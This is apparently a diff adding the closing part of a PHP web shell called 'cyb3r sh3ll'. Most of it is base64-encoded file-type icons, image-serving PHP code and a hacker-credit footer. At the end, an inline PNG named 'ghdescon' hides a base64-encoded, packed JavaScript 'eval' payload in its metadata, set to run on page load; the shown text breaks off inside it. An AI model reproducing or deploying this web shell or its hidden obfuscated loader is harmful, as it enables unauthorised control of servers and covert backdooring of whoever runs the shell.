+"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/".
+
+"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm".
+
+"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/".
+
+"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm".
+
+"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/".
+
+"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ".
+
+"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA".
+
+"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ".
+
+"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A".
+
+"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z".
+
+"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAsA".
+
+"AAg4AP8JREFQ4D+CCBOi4MawITeFCg/iQhEPxcSBlFCoQ5Fx4MSKv1BgRGGMo0iJFC2ehHjSoMt/".
+
+"AQEAOw==",
+
+"sql_button_empty"=>
+
+"R0lGODlhCQAKAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/".
+
+"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm".
+
+"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/".
+
+"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm".
+
+"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/".
+
+"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm".
+
+"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/".
+
+"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ".
+
+"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA".
+
+"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ".
+
+"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A".
+
+"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z".
+
+"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAoA".
+
+"AAgjAP8JREFQ4D+CCBOiMMhQocKDEBcujEiRosSBFjFenOhwYUAAOw==",
+
+"sql_button_insert"=>
+
+"R0lGODlhDQAMAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/".
+
+"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm".
+
+"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/".
+
+"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm".
+
+"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/".
+
+"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm".
+
+"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/".
+
+"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ".
+
+"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA".
+
+"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ".
+
+"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A".
+
+"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z".
+
+"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAANAAwA".
+
+"AAgzAFEIHEiwoMGDCBH6W0gtoUB//1BENOiP2sKECzNeNIiqY0d/FBf+y0jR48eQGUc6JBgQADs=",
+
+"up"=>
+
+"R0lGODlhFAAUALMAAAAAAP////j4+OPj493d3czMzLKysoaGhk1NTf///wAAAAAAAAAAAAAAAAAA".
+
+"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJq734ns1PnkcgjgXwhcNQrIVhmFonzxwQjnie27jg".
+
+"+4Qgy3XgBX4IoHDlMhRvggFiGiSwWs5XyDftWplEJ+9HQCyx2c1YEDRfwwfxtop4p53PwLKOjvvV".
+
+"IXtdgwgdPGdYfng1IVeJaTIAkpOUlZYfHxEAOw==",
+
+"write"=>
+
+"R0lGODlhFAAUALMAAAAAAP///93d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAAAAAAAAAAAAAA".
+
+"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJqyzFalqEQJuGEQSCnWg6FogpkHAMF4HAJsWh7/ze".
+
+"EQYQLUAsGgM0Wwt3bCJfQSFx10yyBlJn8RfEMgM9X+3qHWq5iED5yCsMCl111knDpuXfYls+IK61".
+
+"LXd+WWEHLUd/ToJFZQOOj5CRjiCBlZaXIBEAOw==",
+
+"ext_asp"=>
+
+"R0lGODdhEAAQALMAAAAAAIAAAACAAICAAAAAgIAAgACAgMDAwICAgP8AAAD/AP//AAAA//8A/wD/".
+
+"/////ywAAAAAEAAQAAAESvDISasF2N6DMNAS8Bxfl1UiOZYe9aUwgpDTq6qP/IX0Oz7AXU/1eRgI".
+
+"D6HPhzjSeLYdYabsDCWMZwhg3WWtKK4QrMHohCAS+hABADs=",
+
+"ext_mp3"=>
+
+"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgMDAwICAAP//AAAAAAAAAANU".
+
+"aGrS7iuKQGsYIqpp6QiZRDQWYAILQQSA2g2o4QoASHGwvBbAN3GX1qXA+r1aBQHRZHMEDSYCz3fc".
+
+"IGtGT8wAUwltzwWNWRV3LDnxYM1ub6GneDwBADs=",
+
+"ext_avi"=>
+
+"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAP///4CAgMDAwP8AAAAAAAAAAAAAAANM".
+
+"WFrS7iuKQGsYIqpp6QiZ1FFACYijB4RMqjbY01DwWg44gAsrP5QFk24HuOhODJwSU/IhBYTcjxe4".
+
+"PYXCyg+V2i44XeRmSfYqsGhAAgA7",
+
+"ext_cgi"=>
+
+"R0lGODlhEAAQAGYAACH5BAEAAEwALAAAAAAQABAAhgAAAJtqCHd3d7iNGa+HMu7er9GiC6+IOOu9".
+
+"DkJAPqyFQql/N/Dlhsyyfe67Af/SFP/8kf/9lD9ETv/PCv/cQ//eNv/XIf/ZKP/RDv/bLf/cMah6".
+
+"LPPYRvzgR+vgx7yVMv/lUv/mTv/fOf/MAv/mcf/NA//qif/MAP/TFf/xp7uZVf/WIP/OBqt/Hv/S".
+
+"Ev/hP+7OOP/WHv/wbHNfP4VzV7uPFv/pV//rXf/ycf/zdv/0eUNJWENKWsykIk9RWMytP//4iEpQ".
+
+"Xv/9qfbptP/uZ93GiNq6XWpRJ//iQv7wsquEQv/jRAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+
+"AAAAAAAAAAAAAAAAAAAAAAeegEyCg0wBhIeHAYqIjAEwhoyEAQQXBJCRhQMuA5eSiooGIwafi4UM".
+
+"BagNFBMcDR4FQwwBAgEGSBBEFSwxNhAyGg6WAkwCBAgvFiUiOBEgNUc7w4ICND8PKCFAOi0JPNKD".
+
+"AkUnGTkRNwMS34MBJBgdRkJLCD7qggEPKxsJKiYTBweJkjhQkk7AhxQ9FqgLMGBGkG8KFCg8JKAi".
+
+"RYtMAgEAOw==",
+
+"ext_cmd"=>
+
+"R0lGODlhEAAQACIAACH5BAEAAAcALAAAAAAQABAAggAAAP///4CAgMDAwAAAgICAAP//AAAAAANI".
+
+"eLrcJzDKCYe9+AogBvlg+G2dSAQAipID5XJDIM+0zNJFkdL3DBg6HmxWMEAAhVlPBhgYdrYhDQCN".
+
+"dmrYAMn1onq/YKpjvEgAADs=",
+
+"ext_cpp"=>
+
+"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANC".
+
+"WLPc9XCASScZ8MlKicobBwRkEIkVYWqT4FICoJ5v7c6s3cqrArwinE/349FiNoFw44rtlqhOL4Ra".
+
+"Eq7YrLDE7a4SADs=",
+
+"ext_ini"=>
+
+"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///8DAwICAgICAAP//AAAAAAAAAANL".
+
+"aArB3ioaNkK9MNbHs6lBKIoCoI1oUJ4N4DCqqYBpuM6hq8P3hwoEgU3mawELBEaPFiAUAMgYy3VM".
+
+"SnEjgPVarHEHgrB43JvszsQEADs=",
+
+"ext_diz"=>
+
+"R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAP///15phcfb6NLs/7Pc/+P0/3J+l9bs".
+
+"/52nuqjK5/n///j///7///r//0trlsPn/8nn/8nZ5trm79nu/8/q/9Xt/9zw/93w/+j1/9Hr/+Dv".
+
+"/d7v/73H0MjU39zu/9br/8ne8tXn+K6/z8Xj/LjV7dDp/6K4y8bl/5O42Oz2/7HW9Ju92u/9/8T3".
+
+"/+L//+7+/+v6/+/6/9H4/+X6/+Xl5Pz//+/t7fX08vD//+3///P///H///P7/8nq/8fp/8Tl98zr".
+
+"/+/z9vT4++n1/b/k/dny/9Hv/+v4/9/0/9fw/8/u/8vt/+/09xUvXhQtW4KTs2V1kw4oVTdYpDZX".
+
+"pVxqhlxqiExkimKBtMPL2Ftvj2OV6aOuwpqlulyN3cnO1wAAXQAAZSM8jE5XjgAAbwAAeURBYgAA".
+
+"dAAAdzZEaE9wwDZYpmVviR49jG12kChFmgYuj6+1xeLn7Nzj6pm20oeqypS212SJraCyxZWyz7PW".
+
+"9c/o/87n/8DX7MHY7q/K5LfX9arB1srl/2+fzq290U14q7fCz6e2yXum30FjlClHc4eXr6bI+bTK".
+
+"4rfW+NXe6Oby/5SvzWSHr+br8WuKrQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+
+"AAjgACsJrDRHSICDQ7IMXDgJx8EvZuIcbPBooZwbBwOMAfMmYwBCA2sEcNBjJCMYATLIOLiokocm".
+
+"C1QskAClCxcGBj7EsNHoQAciSCC1mNAmjJgGGEBQoBHigKENBjhcCBAIzRoGFkwQMNKnyggRSRAg".
+
+"2BHpDBUeewRV0PDHCp4BSgjw0ZGHzJQcEVD4IEHJzYkBfo4seYGlDBwgTCAAYvFE4KEBJYI4UrPF".
+
+"CyIIK+woYjMwQQI6Cor8mKEnxR0nAhYKjHJFQYECkqSkSa164IM6LhLRrr3wwaBCu3kPFKCldkAA".
+
+"Ow==",
+
+"ext_doc"=>
+
+"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAP///8DAwAAA/4CAgAAAAAAAAAAAAANR".
+
+"WErcrrCQQCslQA2wOwdXkIFWNVBA+nme4AZCuolnRwkwF9QgEOPAFG21A+Z4sQHO94r1eJRTJVmq".
+
+"MIOrrPSWWZRcza6kaolBCOB0WoxRud0JADs=",
+
+"ext_exe"=>
+
+"R0lGODlhEwAOAKIAAAAAAP///wAAvcbGxoSEhP///wAAAAAAACH5BAEAAAUALAAAAAATAA4AAAM7".
+
+"WLTcTiWSQautBEQ1hP+gl21TKAQAio7S8LxaG8x0PbOcrQf4tNu9wa8WHNKKRl4sl+y9YBuAdEqt".
+
+"xhIAOw==",
+
+"ext_h"=>
+
+"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANB".
+
+"WLPc9XCASScZ8MlKCcARRwVkEAKCIBKmNqVrq7wpbMmbbbOnrgI8F+q3w9GOQOMQGZyJOspnMkKo".
+
+"Wq/NknbbSgAAOw==",
+
+"ext_hpp"=>
+
+"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANF".
+
+"WLPc9XCASScZ8MlKicobBwRkEAGCIAKEqaFqpbZnmk42/d43yroKmLADlPBis6LwKNAFj7jfaWVR".
+
+"UqUagnbLdZa+YFcCADs=",
+
+"ext_htaccess"=>
+
+"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP8AAP8A/wAAgIAAgP//AAAAAAAAAAM6".
+
+"WEXW/k6RAGsjmFoYgNBbEwjDB25dGZzVCKgsR8LhSnprPQ406pafmkDwUumIvJBoRAAAlEuDEwpJ".
+
+"AAA7",
+
+"ext_html"=>
+
+"R0lGODlhEwAQALMAAAAAAP///2trnM3P/FBVhrPO9l6Itoyt0yhgk+Xy/WGp4sXl/i6Z4mfd/HNz".
+
+"c////yH5BAEAAA8ALAAAAAATABAAAAST8Ml3qq1m6nmC/4GhbFoXJEO1CANDSociGkbACHi20U3P".
+
+"KIFGIjAQODSiBWO5NAxRRmTggDgkmM7E6iipHZYKBVNQSBSikukSwW4jymcupYFgIBqL/MK8KBDk".
+
+"Bkx2BXWDfX8TDDaFDA0KBAd9fnIKHXYIBJgHBQOHcg+VCikVA5wLpYgbBKurDqysnxMOs7S1sxIR".
+
+"ADs=",
+
+"ext_jpg"=>
+
+"R0lGODlhEAAQADMAACH5BAEAAAkALAAAAAAQABAAgwAAAP///8DAwICAgICAAP8AAAD/AIAAAACA".
+
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARccMhJk70j6K3FuFbGbULwJcUhjgHgAkUqEgJNEEAgxEci".
+
+"Ci8ALsALaXCGJK5o1AGSBsIAcABgjgCEwAMEXp0BBMLl/A6x5WZtPfQ2g6+0j8Vx+7b4/NZqgftd".
+
+"FxEAOw==",
+
+"ext_js"=>
+
+"R0lGODdhEAAQACIAACwAAAAAEAAQAIL///8AAACAgIDAwMD//wCAgAAAAAAAAAADUCi63CEgxibH".
+
+"k0AQsG200AQUJBgAoMihj5dmIxnMJxtqq1ddE0EWOhsG16m9MooAiSWEmTiuC4Tw2BB0L8FgIAhs".
+
+"a00AjYYBbc/o9HjNniUAADs=",
+
+"ext_lnk"=>
+
+"R0lGODlhEAAQAGYAACH5BAEAAFAALAAAAAAQABAAhgAAAABiAGPLMmXMM0y/JlfFLFS6K1rGLWjO".
+
+"NSmuFTWzGkC5IG3TOo/1XE7AJx2oD5X7YoTqUYrwV3/lTHTaQXnfRmDGMYXrUjKQHwAMAGfNRHzi".
+
+"Uww5CAAqADOZGkasLXLYQghIBBN3DVG2NWnPRnDWRwBOAB5wFQBBAAA+AFG3NAk5BSGHEUqwMABk".
+
+"AAAgAAAwAABfADe0GxeLCxZcDEK6IUuxKFjFLE3AJ2HHMRKiCQWCAgBmABptDg+HCBZeDAqFBWDG".
+
+"MymUFQpWBj2fJhdvDQhOBC6XF3fdR0O6IR2ODwAZAHPZQCSREgASADaXHwAAAAAAAAAAAAAAAAAA".
+
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+
+"AAAAAAAAAAAAAAAAAAAAAAeZgFBQPAGFhocAgoI7Og8JCgsEBQIWPQCJgkCOkJKUP5eYUD6PkZM5".
+
+"NKCKUDMyNTg3Agg2S5eqUEpJDgcDCAxMT06hgk26vAwUFUhDtYpCuwZByBMRRMyCRwMGRkUg0xIf".
+
+"1lAeBiEAGRgXEg0t4SwroCYlDRAn4SmpKCoQJC/hqVAuNGzg8E9RKBEjYBS0JShGh4UMoYASBiUQ".
+
+"ADs=",
+
+"ext_log"=>
+
+"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAMDAwICAgICAAAAAgAAA////AAAA".
+
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARQEKEwK6UyBzC475gEAltJklLRAWzbClRhrK4Ly5yg7/wN".
+
+"zLUaLGBQBV2EgFLV4xEOSSWt9gQQBpRpqxoVNaPKkFb5Eh/LmUGzF5qE3+EMIgIAOw==",
+
+"ext_php"=>
+
+"R0lGODlhEAAQAAAAACH5BAEAAAEALAAAAAAQABAAgAAAAAAAAAImDA6hy5rW0HGosffsdTpqvFlg".
+
+"t0hkyZ3Q6qloZ7JimomVEb+uXAAAOw==",
+
+"ext_pl"=>
+
+"R0lGODlhFAAUAKL/AP/4/8DAwH9/AP/4AL+/vwAAAAAAAAAAACH5BAEAAAEALAAAAAAUABQAQAMo".
+
+"GLrc3gOAMYR4OOudreegRlBWSJ1lqK5s64LjWF3cQMjpJpDf6//ABAA7",
+
+"ext_swf"=>
+
+"R0lGODlhFAAUAMQRAP+cnP9SUs4AAP+cAP/OAIQAAP9jAM5jnM6cY86cnKXO98bexpwAAP8xAP/O".
+
+"nAAAAP///////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA".
+
+"ABEALAAAAAAUABQAAAV7YCSOZGme6PmsbMuqUCzP0APLzhAbuPnQAweE52g0fDKCMGgoOm4QB4GA".
+
+"GBgaT2gMQYgVjUfST3YoFGKBRgBqPjgYDEFxXRpDGEIA4xAQQNR1NHoMEAACABFhIz8rCncMAGgC".
+
+"NysLkDOTSCsJNDJanTUqLqM2KaanqBEhADs=",
+
+"ext_tar"=>
+
+"R0lGODlhEAAQAGYAACH5BAEAAEsALAAAAAAQABAAhgAAABlOAFgdAFAAAIYCUwA8ZwA8Z9DY4JIC".
+
+"Wv///wCIWBE2AAAyUJicqISHl4CAAPD4/+Dg8PX6/5OXpL7H0+/2/aGmsTIyMtTc5P//sfL5/8XF".
+
+"HgBYpwBUlgBWn1BQAG8aIABQhRbfmwDckv+H11nouELlrizipf+V3nPA/40CUzmm/wA4XhVDAAGD".
+
+"UyWd/0it/1u1/3NzAP950P990mO5/7v14YzvzXLrwoXI/5vS/7Dk/wBXov9syvRjwOhatQCHV17p".
+
+"uo0GUQBWnP++8Lm5AP+j5QBUlACKWgA4bjJQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+
+"AAAAAAAAAAAAAAAAAAAAAAeegAKCg4SFSxYNEw4gMgSOj48DFAcHEUIZREYoJDQzPT4/AwcQCQkg".
+
+"GwipqqkqAxIaFRgXDwO1trcAubq7vIeJDiwhBcPExAyTlSEZOzo5KTUxMCsvDKOlSRscHDweHkMd".
+
+"HUcMr7GzBufo6Ay87Lu+ii0fAfP09AvIER8ZNjc4QSUmTogYscBaAiVFkChYyBCIiwXkZD2oR3FB".
+
+"u4tLAgEAOw==",
+
+"ext_txt"=>
+
+"R0lGODlhEwAQAKIAAAAAAP///8bGxoSEhP///wAAAAAAAAAAACH5BAEAAAQALAAAAAATABAAAANJ".
+
+"SArE3lDJFka91rKpA/DgJ3JBaZ6lsCkW6qqkB4jzF8BS6544W9ZAW4+g26VWxF9wdowZmznlEup7".
+
+"UpPWG3Ig6Hq/XmRjuZwkAAA7",
+
+"ext_wri"=>
+
+"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAICAgMDAwICAAAAAgAAA////AAAA".
+
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARRUMhJkb0C6K2HuEiRcdsAfKExkkDgBoVxstwAAypduoao".
+
+"a4SXT0c4BF0rUhFAEAQQI9dmebREW8yXC6Nx2QI7LrYbtpJZNsxgzW6nLdq49hIBADs=",
+
+"ext_xml"=>
+
+"R0lGODlhEAAQAEQAACH5BAEAABAALAAAAAAQABAAhP///wAAAPHx8YaGhjNmmabK8AAAmQAAgACA".
+
+"gDOZADNm/zOZ/zP//8DAwDPM/wAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+
+"AAAAAAAAAAAAAAAAAAVk4CCOpAid0ACsbNsMqNquAiA0AJzSdl8HwMBOUKghEApbESBUFQwABICx".
+
+"OAAMxebThmA4EocatgnYKhaJhxUrIBNrh7jyt/PZa+0hYc/n02V4dzZufYV/PIGJboKBQkGPkEEQ".
+
+"IQA7"
+
+ );
+
+ //For simple size- and speed-optimization.
+
+ $imgequals = array(
+
+  "ext_tar"=>array("ext_tar","ext_r00","ext_ace","ext_arj","ext_bz","ext_bz2","ext_tbz","ext_tbz2","ext_tgz","ext_uu","ext_xxe","ext_zip","ext_cab","ext_gz","ext_iso","ext_lha","ext_lzh","ext_pbk","ext_rar","ext_uuf"),
+
+  "ext_php"=>array("ext_php","ext_php3","ext_php4","ext_php5","ext_phtml","ext_shtml","ext_htm"),
+
+  "ext_jpg"=>array("ext_jpg","ext_gif","ext_png","ext_jpeg","ext_jfif","ext_jpe","ext_bmp","ext_ico","ext_tif","tiff"),
+
+  "ext_html"=>array("ext_html","ext_htm"),
+
+  "ext_avi"=>array("ext_avi","ext_mov","ext_mvi","ext_mpg","ext_mpeg","ext_wmv","ext_rm"),
+
+  "ext_lnk"=>array("ext_lnk","ext_url"),
+
+  "ext_ini"=>array("ext_ini","ext_css","ext_inf"),
+
+  "ext_doc"=>array("ext_doc","ext_dot"),
+
+  "ext_js"=>array("ext_js","ext_vbs"),
+
+  "ext_cmd"=>array("ext_cmd","ext_bat","ext_pif"),
+
+  "ext_wri"=>array("ext_wri","ext_rtf"),
+
+  "ext_swf"=>array("ext_swf","ext_fla"),
+
+  "ext_mp3"=>array("ext_mp3","ext_au","ext_midi","ext_mid"),
+
+  "ext_htaccess"=>array("ext_htaccess","ext_htpasswd","ext_ht","ext_hta","ext_so")
+
+ );
+
+ if (!$getall)
+
+ {
+
+  header("Content-type: image/gif");
+
+  header("Cache-control: public");
+
+  header("Cache-control: max-age=".(60*60*24*7));
+
+  header("Last-Modified: ".date("r",filemtime(__FILE__)));
+
+  foreach($imgequals as $k=>$v) {if (in_array($img,$v)) {$img = $k; break;}}
+
+  if (empty($images[$img])) {$img = "small_unk";}
+
+  if (in_array($img,$ext_tar)) {$img = "ext_tar";}
+
+  echo base64_decode($images[$img]);
+
+ }
+
+ else
+
+ {
+
+  foreach($imgequals as $a=>$b) {foreach ($b as $d) {if ($a != $d) {if (!empty($images[$d])) {echo("Warning! Remove \$images[".$d."]<br>");}}}}
+
+  natsort($images);
+
+  $k = array_keys($images);
+
+  echo  "<center>";
+
+  foreach ($k as $u) {echo $u.":<img src=\"".$surl."act=img&img=".$u."\" border=\"1\"><br>";}
+
+  echo "</center>";
+
+ }
+
+ exit;
+
+}
+
+?>
+
+</td></tr></table><a bookmark="minipanel" /><br/>
+<?php
+}
+?>
+<TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=0 width="100%" bgColor=#15354c borderColorLight=#c0c0c0 border=1 bordercolor='#C0C0C0'><tr><td height="1" valign="top"><table align="center"><tr><td height="0" valign="top"><center><font face="times, serif" size="3"><b>(C) <font color="orange">Copyright</font><font color="white"> cyb3r </font><font color="green">9l4d!470r</font> [All rights reserved]</b></center></td></tr><tr><td height="0" valign="top"><center><b>Greetz to :</b> r45c4l bro, r8l35n4k, Cyb3R_s3CuR3 and all my friends who helped me a lot.</center></td></tr><tr><td height="0" valign="top"><center><b>--[ cyb3r sh3ll v. <?php echo $shver; ?> <a href="<?php echo $surl; ?>act=about"><u>Coded by</u></a> cyb3r 9l4d!470r (cyber gladiator) | <a href="#"><font color="#FF0000">h4cK2b0yZz..</font></a><font color="#FF0000"></font> | Generation time: <?php echo round(getmicrotime()-starttime,4); ?> ]--</b></font></center></td></tr></table></td></tr></table>
+</center>
+<img id="ghdescon" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQAQMAAAAlPW0iAAAAA1BMVEX///+nxBvIAAAAAXRSTlMAQObYZgAAB510RVh0Z2hkZQBnaGRlc2NvblpYWmhiQ2htZFc1amRHbHZiaWh3TEdFc1l5eHJMR1VzY2lsN1pUMW1kVzVqZEdsdmJpaGpLWHR5WlhSMWNtNG9ZenhoUHljbk9tVW9jR0Z5YzJWSmJuUW9ZeTloS1NrcEt5Z29ZejFqSldFcFBqTTFQMU4wY21sdVp5NW1jbTl0UTJoaGNrTnZaR1VvWXlzeU9TazZZeTUwYjFOMGNtbHVaeWd6TmlrcGZUdHBaaWdoSnljdWNtVndiR0ZqWlNndlhpOHNVM1J5YVc1bktTbDdkMmhwYkdVb1l5MHRLWEpiWlNoaktWMDlhMXRqWFh4OFpTaGpLVHRyUFZ0bWRXNWpkR2x2YmlobEtYdHlaWFIxY200Z2NsdGxYWDFkTzJVOVpuVnVZM1JwYjI0b0tYdHlaWFIxY200blhGeDNLeWQ5TzJNOU1YMDdkMmhwYkdVb1l5MHRLV2xtS0d0YlkxMHBjRDF3TG5KbGNHeGhZMlVvYm1WM0lGSmxaMFY0Y0NnblhGeGlKeXRsS0dNcEt5ZGNYR0luTENkbkp5a3NhMXRqWFNrN2NtVjBkWEp1SUhCOUtDZFZMbmM5TkNCM0tHTXBlelFnZUNoa0xIQXBlekVnYVQwd096RWdlajB3T3pFZ2NqMWNKMXduT3prb01TQnBQVEE3YVR4a0xqYzdhU3NyS1hzMUtIbzlQWEF1TnlsNlBUQTdjaXM5YkM1dEtHUXVieWhwS1Y1d0xtOG9laWtwTzNvckszMHpJSEo5TkNCQktITXBlekVnWVQxY0oxd25PemtvTVNCcFBUQTdhVHh